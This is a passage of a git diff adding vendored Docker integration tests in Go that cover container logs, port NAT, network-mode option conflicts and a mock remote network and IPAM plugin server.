+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg))
+
+	id := strings.TrimSpace(out)
+	dockerCmd(c, "wait", id)
+
+	stdout, stderr, _ := dockerCmdWithStdoutStderr(c, "logs", id)
+
+	c.Assert(stdout, checker.Equals, "")
+
+	stderr = strings.TrimSpace(stderr)
+
+	c.Assert(stderr, checker.Equals, msg)
+}
+
+func (s *DockerSuite) TestLogsStderrInStdout(c *check.C) {
+	// TODO Windows: Needs investigation why this fails. Obtained string includes
+	// a bunch of ANSI escape sequences before the "stderr_log" message.
+	testRequires(c, DaemonIsLinux)
+	msg := "stderr_log"
+	out, _ := dockerCmd(c, "run", "-d", "-t", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg))
+
+	id := strings.TrimSpace(out)
+	dockerCmd(c, "wait", id)
+
+	stdout, stderr, _ := dockerCmdWithStdoutStderr(c, "logs", id)
+	c.Assert(stderr, checker.Equals, "")
+
+	stdout = strings.TrimSpace(stdout)
+	c.Assert(stdout, checker.Equals, msg)
+}
+
+func (s *DockerSuite) TestLogsTail(c *check.C) {
+	testLen := 100
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo =; done;", testLen))
+
+	id := strings.TrimSpace(out)
+	dockerCmd(c, "wait", id)
+
+	out, _ = dockerCmd(c, "logs", "--tail", "0", id)
+	lines := strings.Split(out, "\n")
+	c.Assert(lines, checker.HasLen, 1)
+
+	out, _ = dockerCmd(c, "logs", "--tail", "5", id)
+	lines = strings.Split(out, "\n")
+	c.Assert(lines, checker.HasLen, 6)
+
+	out, _ = dockerCmd(c, "logs", "--tail", "99", id)
+	lines = strings.Split(out, "\n")
+	c.Assert(lines, checker.HasLen, 100)
+
+	out, _ = dockerCmd(c, "logs", "--tail", "all", id)
+	lines = strings.Split(out, "\n")
+	c.Assert(lines, checker.HasLen, testLen+1)
+
+	out, _ = dockerCmd(c, "logs", "--tail", "-1", id)
+	lines = strings.Split(out, "\n")
+	c.Assert(lines, checker.HasLen, testLen+1)
+
+	out, _, _ = dockerCmdWithStdoutStderr(c, "logs", "--tail", "random", id)
+	lines = strings.Split(out, "\n")
+	c.Assert(lines, checker.HasLen, testLen+1)
+}
+
+func (s *DockerSuite) TestLogsFollowStopped(c *check.C) {
+	dockerCmd(c, "run", "--name=test", "busybox", "echo", "hello")
+	id, err := getIDByName("test")
+	c.Assert(err, check.IsNil)
+
+	logsCmd := exec.Command(dockerBinary, "logs", "-f", id)
+	c.Assert(logsCmd.Start(), checker.IsNil)
+
+	errChan := make(chan error)
+	go func() {
+		errChan <- logsCmd.Wait()
+		close(errChan)
+	}()
+
+	select {
+	case err := <-errChan:
+		c.Assert(err, checker.IsNil)
+	case <-time.After(30 * time.Second):
+		c.Fatal("Following logs is hanged")
+	}
+}
+
+func (s *DockerSuite) TestLogsSince(c *check.C) {
+	name := "testlogssince"
+	dockerCmd(c, "run", "--name="+name, "busybox", "/bin/sh", "-c", "for i in $(seq 1 3); do sleep 2; echo log$i; done")
+	out, _ := dockerCmd(c, "logs", "-t", name)
+
+	log2Line := strings.Split(strings.Split(out, "\n")[1], " ")
+	t, err := time.Parse(time.RFC3339Nano, log2Line[0]) // the timestamp log2 is written
+	c.Assert(err, checker.IsNil)
+	since := t.Unix() + 1 // add 1s so log1 & log2 doesn't show up
+	out, _ = dockerCmd(c, "logs", "-t", fmt.Sprintf("--since=%v", since), name)
+
+	// Skip 2 seconds
+	unexpected := []string{"log1", "log2"}
+	for _, v := range unexpected {
+		c.Assert(out, checker.Not(checker.Contains), v, check.Commentf("unexpected log message returned, since=%v", since))
+	}
+
+	// Test to make sure a bad since format is caught by the client
+	out, _, _ = dockerCmdWithError("logs", "-t", "--since=2006-01-02T15:04:0Z", name)
+	c.Assert(out, checker.Contains, "cannot parse \"0Z\" as \"05\"", check.Commentf("bad since format passed to server"))
+
+	// Test with default value specified and parameter omitted
+	expected := []string{"log1", "log2", "log3"}
+	for _, cmd := range []*exec.Cmd{
+		exec.Command(dockerBinary, "logs", "-t", name),
+		exec.Command(dockerBinary, "logs", "-t", "--since=0", name),
+	} {
+		out, _, err = runCommandWithOutput(cmd)
+		c.Assert(err, checker.IsNil, check.Commentf("failed to log container: %s", out))
+		for _, v := range expected {
+			c.Assert(out, checker.Contains, v)
+		}
+	}
+}
+
+func (s *DockerSuite) TestLogsSinceFutureFollow(c *check.C) {
+	// TODO Windows TP5 - Figure out why this test is so flakey. Disabled for now.
+	testRequires(c, DaemonIsLinux)
+	name := "testlogssincefuturefollow"
+	out, _ := dockerCmd(c, "run", "-d", "--name", name, "busybox", "/bin/sh", "-c", `for i in $(seq 1 5); do echo log$i; sleep 1; done`)
+
+	// Extract one timestamp from the log file to give us a starting point for
+	// our `--since` argument. Because the log producer runs in the background,
+	// we need to check repeatedly for some output to be produced.
+	var timestamp string
+	for i := 0; i != 100 && timestamp == ""; i++ {
+		if out, _ = dockerCmd(c, "logs", "-t", name); out == "" {
+			time.Sleep(time.Millisecond * 100) // Retry
+		} else {
+			timestamp = strings.Split(strings.Split(out, "\n")[0], " ")[0]
+		}
+	}
+
+	c.Assert(timestamp, checker.Not(checker.Equals), "")
+	t, err := time.Parse(time.RFC3339Nano, timestamp)
+	c.Assert(err, check.IsNil)
+
+	since := t.Unix() + 2
+	out, _ = dockerCmd(c, "logs", "-t", "-f", fmt.Sprintf("--since=%v", since), name)
+	c.Assert(out, checker.Not(checker.HasLen), 0, check.Commentf("cannot read from empty log"))
+	lines := strings.Split(strings.TrimSpace(out), "\n")
+	for _, v := range lines {
+		ts, err := time.Parse(time.RFC3339Nano, strings.Split(v, " ")[0])
+		c.Assert(err, checker.IsNil, check.Commentf("cannot parse timestamp output from log: '%v'", v))
+		c.Assert(ts.Unix() >= since, checker.Equals, true, check.Commentf("earlier log found. since=%v logdate=%v", since, ts))
+	}
+}
+
+// Regression test for #8832
+func (s *DockerSuite) TestLogsFollowSlowStdoutConsumer(c *check.C) {
+	// TODO Windows: Fix this test for TP5.
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", `usleep 600000;yes X | head -c 200000`)
+
+	id := strings.TrimSpace(out)
+
+	stopSlowRead := make(chan bool)
+
+	go func() {
+		exec.Command(dockerBinary, "wait", id).Run()
+		stopSlowRead <- true
+	}()
+
+	logCmd := exec.Command(dockerBinary, "logs", "-f", id)
+	stdout, err := logCmd.StdoutPipe()
+	c.Assert(err, checker.IsNil)
+	c.Assert(logCmd.Start(), checker.IsNil)
+
+	// First read slowly
+	bytes1, err := consumeWithSpeed(stdout, 10, 50*time.Millisecond, stopSlowRead)
+	c.Assert(err, checker.IsNil)
+
+	// After the container has finished we can continue reading fast
+	bytes2, err := consumeWithSpeed(stdout, 32*1024, 0, nil)
+	c.Assert(err, checker.IsNil)
+
+	actual := bytes1 + bytes2
+	expected := 200000
+	c.Assert(actual, checker.Equals, expected)
+}
+
+func (s *DockerSuite) TestLogsFollowGoroutinesWithStdout(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true; do echo hello; sleep 2; done")
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	nroutines, err := getGoroutineNumber()
+	c.Assert(err, checker.IsNil)
+	cmd := exec.Command(dockerBinary, "logs", "-f", id)
+	r, w := io.Pipe()
+	cmd.Stdout = w
+	c.Assert(cmd.Start(), checker.IsNil)
+
+	// Make sure pipe is written to
+	chErr := make(chan error)
+	go func() {
+		b := make([]byte, 1)
+		_, err := r.Read(b)
+		chErr <- err
+	}()
+	c.Assert(<-chErr, checker.IsNil)
+	c.Assert(cmd.Process.Kill(), checker.IsNil)
+
+	// NGoroutines is not updated right away, so we need to wait before failing
+	c.Assert(waitForGoroutines(nroutines), checker.IsNil)
+}
+
+func (s *DockerSuite) TestLogsFollowGoroutinesNoOutput(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true; do sleep 2; done")
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	nroutines, err := getGoroutineNumber()
+	c.Assert(err, checker.IsNil)
+	cmd := exec.Command(dockerBinary, "logs", "-f", id)
+	c.Assert(cmd.Start(), checker.IsNil)
+	time.Sleep(200 * time.Millisecond)
+	c.Assert(cmd.Process.Kill(), checker.IsNil)
+
+	// NGoroutines is not updated right away, so we need to wait before failing
+	c.Assert(waitForGoroutines(nroutines), checker.IsNil)
+}
+
+func (s *DockerSuite) TestLogsCLIContainerNotFound(c *check.C) {
+	name := "testlogsnocontainer"
+	out, _, _ := dockerCmdWithError("logs", name)
+	message := fmt.Sprintf("Error: No such container: %s\n", name)
+	c.Assert(out, checker.Equals, message)
+}
+
+func (s *DockerSuite) TestLogsWithDetails(c *check.C) {
+	dockerCmd(c, "run", "--name=test", "--label", "foo=bar", "-e", "baz=qux", "--log-opt", "labels=foo", "--log-opt", "env=baz", "busybox", "echo", "hello")
+	out, _ := dockerCmd(c, "logs", "--details", "--timestamps", "test")
+
+	logFields := strings.Fields(strings.TrimSpace(out))
+	c.Assert(len(logFields), checker.Equals, 3, check.Commentf(out))
+
+	details := strings.Split(logFields[1], ",")
+	c.Assert(details, checker.HasLen, 2)
+	c.Assert(details[0], checker.Equals, "baz=qux")
+	c.Assert(details[1], checker.Equals, "foo=bar")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go
new file mode 100644
index 0000000000..7f4cc2cbd7
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go
@@ -0,0 +1,93 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func startServerContainer(c *check.C, msg string, port int) string {
+	name := "server"
+	cmd := []string{
+		"-d",
+		"-p", fmt.Sprintf("%d:%d", port, port),
+		"busybox",
+		"sh", "-c", fmt.Sprintf("echo %q | nc -lp %d", msg, port),
+	}
+	c.Assert(waitForContainer(name, cmd...), check.IsNil)
+	return name
+}
+
+func getExternalAddress(c *check.C) net.IP {
+	iface, err := net.InterfaceByName("eth0")
+	if err != nil {
+		c.Skip(fmt.Sprintf("Test not running with `make test`. Interface eth0 not found: %v", err))
+	}
+
+	ifaceAddrs, err := iface.Addrs()
+	c.Assert(err, check.IsNil)
+	c.Assert(ifaceAddrs, checker.Not(checker.HasLen), 0)
+
+	ifaceIP, _, err := net.ParseCIDR(ifaceAddrs[0].String())
+	c.Assert(err, check.IsNil)
+
+	return ifaceIP
+}
+
+func getContainerLogs(c *check.C, containerID string) string {
+	out, _ := dockerCmd(c, "logs", containerID)
+	return strings.Trim(out, "\r\n")
+}
+
+func getContainerStatus(c *check.C, containerID string) string {
+	out := inspectField(c, containerID, "State.Running")
+	return out
+}
+
+func (s *DockerSuite) TestNetworkNat(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	msg := "it works"
+	startServerContainer(c, msg, 8080)
+	endpoint := getExternalAddress(c)
+	conn, err := net.Dial("tcp", fmt.Sprintf("%s:%d", endpoint.String(), 8080))
+	c.Assert(err, check.IsNil)
+
+	data, err := ioutil.ReadAll(conn)
+	conn.Close()
+	c.Assert(err, check.IsNil)
+
+	final := strings.TrimRight(string(data), "\n")
+	c.Assert(final, checker.Equals, msg)
+}
+
+func (s *DockerSuite) TestNetworkLocalhostTCPNat(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	var (
+		msg = "hi yall"
+	)
+	startServerContainer(c, msg, 8081)
+	conn, err := net.Dial("tcp", "localhost:8081")
+	c.Assert(err, check.IsNil)
+
+	data, err := ioutil.ReadAll(conn)
+	conn.Close()
+	c.Assert(err, check.IsNil)
+
+	final := strings.TrimRight(string(data), "\n")
+	c.Assert(final, checker.Equals, msg)
+}
+
+func (s *DockerSuite) TestNetworkLoopbackNat(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace)
+	msg := "it works"
+	startServerContainer(c, msg, 8080)
+	endpoint := getExternalAddress(c)
+	out, _ := dockerCmd(c, "run", "-t", "--net=container:server", "busybox",
+		"sh", "-c", fmt.Sprintf("stty raw && nc -w 5 %s 8080", endpoint.String()))
+	final := strings.TrimRight(string(out), "\n")
+	c.Assert(final, checker.Equals, msg)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go
new file mode 100644
index 0000000000..4dfad937b5
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go
@@ -0,0 +1,94 @@
+package main
+
+import (
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/runconfig"
+	"github.com/go-check/check"
+)
+
+// GH14530. Validates combinations of --net= with other options
+
+// stringCheckPS is how the output of PS starts in order to validate that
+// the command executed in a container did really run PS correctly.
+const stringCheckPS = "PID   USER"
+
+// DockerCmdWithFail executes a docker command that is supposed to fail and returns
+// the output, the exit code. If the command returns a Nil error, it will fail and
+// stop the tests.
+func dockerCmdWithFail(c *check.C, args ...string) (string, int) {
+	out, status, err := dockerCmdWithError(args...)
+	c.Assert(err, check.NotNil, check.Commentf("%v", out))
+	return out, status
+}
+
+func (s *DockerSuite) TestNetHostnameWithNetHost(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+
+	out, _ := dockerCmd(c, "run", "--net=host", "busybox", "ps")
+	c.Assert(out, checker.Contains, stringCheckPS)
+}
+
+func (s *DockerSuite) TestNetHostname(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "-h=name", "busybox", "ps")
+	c.Assert(out, checker.Contains, stringCheckPS)
+
+	out, _ = dockerCmd(c, "run", "-h=name", "--net=bridge", "busybox", "ps")
+	c.Assert(out, checker.Contains, stringCheckPS)
+
+	out, _ = dockerCmd(c, "run", "-h=name", "--net=none", "busybox", "ps")
+	c.Assert(out, checker.Contains, stringCheckPS)
+
+	out, _ = dockerCmdWithFail(c, "run", "-h=name", "--net=container:other", "busybox", "ps")
+	c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkHostname.Error())
+
+	out, _ = dockerCmdWithFail(c, "run", "--net=container", "busybox", "ps")
+	c.Assert(out, checker.Contains, "--net: invalid net mode: invalid container format container:<name|id>")
+
+	out, _ = dockerCmdWithFail(c, "run", "--net=weird", "busybox", "ps")
+	c.Assert(out, checker.Contains, "network weird not found")
+}
+
+func (s *DockerSuite) TestConflictContainerNetworkAndLinks(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	out, _ := dockerCmdWithFail(c, "run", "--net=container:other", "--link=zip:zap", "busybox", "ps")
+	c.Assert(out, checker.Contains, runconfig.ErrConflictContainerNetworkAndLinks.Error())
+}
+
+func (s *DockerSuite) TestConflictContainerNetworkHostAndLinks(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+
+	out, _ := dockerCmdWithFail(c, "run", "--net=host", "--link=zip:zap", "busybox", "ps")
+	c.Assert(out, checker.Contains, runconfig.ErrConflictHostNetworkAndLinks.Error())
+}
+
+func (s *DockerSuite) TestConflictNetworkModeNetHostAndOptions(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+
+	out, _ := dockerCmdWithFail(c, "run", "--net=host", "--mac-address=92:d0:c6:0a:29:33", "busybox", "ps")
+	c.Assert(out, checker.Contains, runconfig.ErrConflictContainerNetworkAndMac.Error())
+}
+
+func (s *DockerSuite) TestConflictNetworkModeAndOptions(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	out, _ := dockerCmdWithFail(c, "run", "--net=container:other", "--dns=8.8.8.8", "busybox", "ps")
+	c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkAndDNS.Error())
+
+	out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "--add-host=name:8.8.8.8", "busybox", "ps")
+	c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkHosts.Error())
+
+	out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "--mac-address=92:d0:c6:0a:29:33", "busybox", "ps")
+	c.Assert(out, checker.Contains, runconfig.ErrConflictContainerNetworkAndMac.Error())
+
+	out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "-P", "busybox", "ps")
+	c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkPublishPorts.Error())
+
+	out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "-p", "8080", "busybox", "ps")
+	c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkPublishPorts.Error())
+
+	out, _ = dockerCmdWithFail(c, "run", "--net=container:other", "--expose", "8000-9000", "busybox", "ps")
+	c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkExposePorts.Error())
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go
new file mode 100644
index 0000000000..97f204ab47
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go
@@ -0,0 +1,1791 @@
+// +build !windows
+
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions/v1p20"
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/runconfig"
+	"github.com/docker/libnetwork/driverapi"
+	remoteapi "github.com/docker/libnetwork/drivers/remote/api"
+	"github.com/docker/libnetwork/ipamapi"
+	remoteipam "github.com/docker/libnetwork/ipams/remote/api"
+	"github.com/docker/libnetwork/netlabel"
+	"github.com/go-check/check"
+	"github.com/vishvananda/netlink"
+)
+
+const dummyNetworkDriver = "dummy-network-driver"
+const dummyIPAMDriver = "dummy-ipam-driver"
+
+var remoteDriverNetworkRequest remoteapi.CreateNetworkRequest
+
+func init() {
+	check.Suite(&DockerNetworkSuite{
+		ds: &DockerSuite{},
+	})
+}
+
+type DockerNetworkSuite struct {
+	server *httptest.Server
+	ds     *DockerSuite
+	d      *Daemon
+}
+
+func (s *DockerNetworkSuite) SetUpTest(c *check.C) {
+	s.d = NewDaemon(c)
+}
+
+func (s *DockerNetworkSuite) TearDownTest(c *check.C) {
+	s.d.Stop()
+	s.ds.TearDownTest(c)
+}
+
+func (s *DockerNetworkSuite) SetUpSuite(c *check.C) {
+	mux := http.NewServeMux()
+	s.server = httptest.NewServer(mux)
+	c.Assert(s.server, check.NotNil, check.Commentf("Failed to start an HTTP Server"))
+	setupRemoteNetworkDrivers(c, mux, s.server.URL, dummyNetworkDriver, dummyIPAMDriver)
+}
+
+func setupRemoteNetworkDrivers(c *check.C, mux *http.ServeMux, url, netDrv, ipamDrv string) {
+
+	mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, `{"Implements": ["%s", "%s"]}`, driverapi.NetworkPluginEndpointType, ipamapi.PluginEndpointType)
+	})
+
+	// Network driver implementation
+	mux.HandleFunc(fmt.Sprintf("/%s.GetCapabilities", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, `{"Scope":"local"}`)
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.CreateNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		err := json.NewDecoder(r.Body).Decode(&remoteDriverNetworkRequest)
+		if err != nil {
+			http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest)
+			return
+		}
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, "null")
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.DeleteNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, "null")
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.CreateEndpoint", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, `{"Interface":{"MacAddress":"a0:b1:c2:d3:e4:f5"}}`)
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.Join", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+
+		veth := &netlink.Veth{
+			LinkAttrs: netlink.LinkAttrs{Name: "randomIfName", TxQLen: 0}, PeerName: "cnt0"}
+		if err := netlink.LinkAdd(veth); err != nil {
+			fmt.Fprintf(w, `{"Error":"failed to add veth pair: `+err.Error()+`"}`)
+		} else {
+			fmt.Fprintf(w, `{"InterfaceName":{ "SrcName":"cnt0", "DstPrefix":"veth"}}`)
+		}
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.Leave", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, "null")
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.DeleteEndpoint", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		if link, err := netlink.LinkByName("cnt0"); err == nil {
+			netlink.LinkDel(link)
+		}
+		fmt.Fprintf(w, "null")
+	})
+
+	// IPAM Driver implementation
+	var (
+		poolRequest       remoteipam.RequestPoolRequest
+		poolReleaseReq    remoteipam.ReleasePoolRequest
+		addressRequest    remoteipam.RequestAddressRequest
+		addressReleaseReq remoteipam.ReleaseAddressRequest
+		lAS               = "localAS"
+		gAS               = "globalAS"
+		pool              = "172.28.0.0/16"
+		poolID            = lAS + "/" + pool
+		gw                = "172.28.255.254/16"
+	)
+
+	mux.HandleFunc(fmt.Sprintf("/%s.GetDefaultAddressSpaces", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		fmt.Fprintf(w, `{"LocalDefaultAddressSpace":"`+lAS+`", "GlobalDefaultAddressSpace": "`+gAS+`"}`)
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.RequestPool", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		err := json.NewDecoder(r.Body).Decode(&poolRequest)
+		if err != nil {
+			http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest)
+			return
+		}
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		if poolRequest.AddressSpace != lAS && poolRequest.AddressSpace != gAS {
+			fmt.Fprintf(w, `{"Error":"Unknown address space in pool request: `+poolRequest.AddressSpace+`"}`)
+		} else if poolRequest.Pool != "" && poolRequest.Pool != pool {
+			fmt.Fprintf(w, `{"Error":"Cannot handle explicit pool requests yet"}`)
+		} else {
+			fmt.Fprintf(w, `{"PoolID":"`+poolID+`", "Pool":"`+pool+`"}`)
+		}
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.RequestAddress", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		err := json.NewDecoder(r.Body).Decode(&addressRequest)
+		if err != nil {
+			http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest)
+			return
+		}
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		// make sure libnetwork is now querying on the expected pool id
+		if addressRequest.PoolID != poolID {
+			fmt.Fprintf(w, `{"Error":"unknown pool id"}`)
+		} else if addressRequest.Address != "" {
+			fmt.Fprintf(w, `{"Error":"Cannot handle explicit address requests yet"}`)
+		} else {
+			fmt.Fprintf(w, `{"Address":"`+gw+`"}`)
+		}
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.ReleaseAddress", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		err := json.NewDecoder(r.Body).Decode(&addressReleaseReq)
+		if err != nil {
+			http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest)
+			return
+		}
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		// make sure libnetwork is now asking to release the expected address from the expected poolid
+		if addressRequest.PoolID != poolID {
+			fmt.Fprintf(w, `{"Error":"unknown pool id"}`)
+		} else if addressReleaseReq.Address != gw {
+			fmt.Fprintf(w, `{"Error":"unknown address"}`)
+		} else {
+			fmt.Fprintf(w, "null")
+		}
+	})
+
+	mux.HandleFunc(fmt.Sprintf("/%s.ReleasePool", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) {
+		err := json.NewDecoder(r.Body).Decode(&poolReleaseReq)
+		if err != nil {
+			http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest)
+			return
+		}
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json")
+		// make sure libnetwork is now asking to release the expected poolid
+		if addressRequest.PoolID != poolID {
+			fmt.Fprintf(w, `{"Error":"unknown pool id"}`)
+		} else {
+			fmt.Fprintf(w, "null")
+		}
+	})
+
+	err := os.MkdirAll("/etc/docker/plugins", 0755)
+	c.Assert(err, checker.IsNil)
+
+	fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", netDrv)
+	err = ioutil.WriteFile(fileName, []byte(url), 0644)
+	c.Assert(err, checker.IsNil)
+
+	ipamFileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", ipamDrv)
+	err = ioutil.WriteFile(ipamFileName, []byte(url), 0644)
+	c.Assert(err, checker.IsNil)
+}
+
+func (s *DockerNetworkSuite) TearDownSuite(c *check.C) {
+	if s.server == nil {
+		return
+	}
+
+	s.server.Close()
+
+	err := os.RemoveAll("/etc/docker/plugins")
+	c.Assert(err, checker.IsNil)
+}
+
+func assertNwIsAvailable(c *check.C, name string) {
+	if !isNwPresent(c, name) {
+		c.Fatalf("Network %s not found in network ls o/p", name)
+	}
+}
+
+func assertNwNotAvailable(c *check.C, name string) {
+	if isNwPresent(c, name) {
+		c.Fatalf("Found network %s in network ls o/p", name)
+	}
+}
+
+func isNwPresent(c *check.C, name string) bool {
+	out, _ := dockerCmd(c, "network", "ls")
+	lines := strings.Split(out, "\n")
+	for i := 1; i < len(lines)-1; i++ {
+		netFields := strings.Fields(lines[i])
+		if netFields[1] == name {
+			return true
+		}
+	}
+	return false
+}
+
+// assertNwList checks network list retrieved with ls command
+// equals to expected network list
+// note: out should be `network ls [option]` result
+func assertNwList(c *check.C, out string, expectNws []string) {
+	lines := strings.Split(out, "\n")
+	var nwList []string
+	for _, line := range lines[1 : len(lines)-1] {
+		netFields := strings.Fields(line)
+		// wrap all network name in nwList
+		nwList = append(nwList, netFields[1])
+	}
+
+	// network ls should contains all expected networks
+	c.Assert(nwList, checker.DeepEquals, expectNws)
+}
+
+func getNwResource(c *check.C, name string) *types.NetworkResource {
+	out, _ := dockerCmd(c, "network", "inspect", name)
+	nr := []types.NetworkResource{}
+	err := json.Unmarshal([]byte(out), &nr)
+	c.Assert(err, check.IsNil)
+	return &nr[0]
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkLsDefault(c *check.C) {
+	defaults := []string{"bridge", "host", "none"}
+	for _, nn := range defaults {
+		assertNwIsAvailable(c, nn)
+	}
+}
+
+func (s *DockerSuite) TestNetworkLsFormat(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "network", "ls", "--format", "{{.Name}}")
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+
+	expected := []string{"bridge", "host", "none"}
+	var names []string
+	names = append(names, lines...)
+	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names))
+}
+
+func (s *DockerSuite) TestNetworkLsFormatDefaultFormat(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	config := `{
+		"networksFormat": "{{ .Name }} default"
+}`
+	d, err := ioutil.TempDir("", "integration-cli-")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(d)
+
+	err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644)
+	c.Assert(err, checker.IsNil)
+
+	out, _ := dockerCmd(c, "--config", d, "network", "ls")
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+
+	expected := []string{"bridge default", "host default", "none default"}
+	var names []string
+	names = append(names, lines...)
+	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names))
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkCreatePredefined(c *check.C) {
+	predefined := []string{"bridge", "host", "none", "default"}
+	for _, net := range predefined {
+		// predefined networks can't be created again
+		out, _, err := dockerCmdWithError("network", "create", net)
+		c.Assert(err, checker.NotNil, check.Commentf("%v", out))
+	}
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkCreateHostBind(c *check.C) {
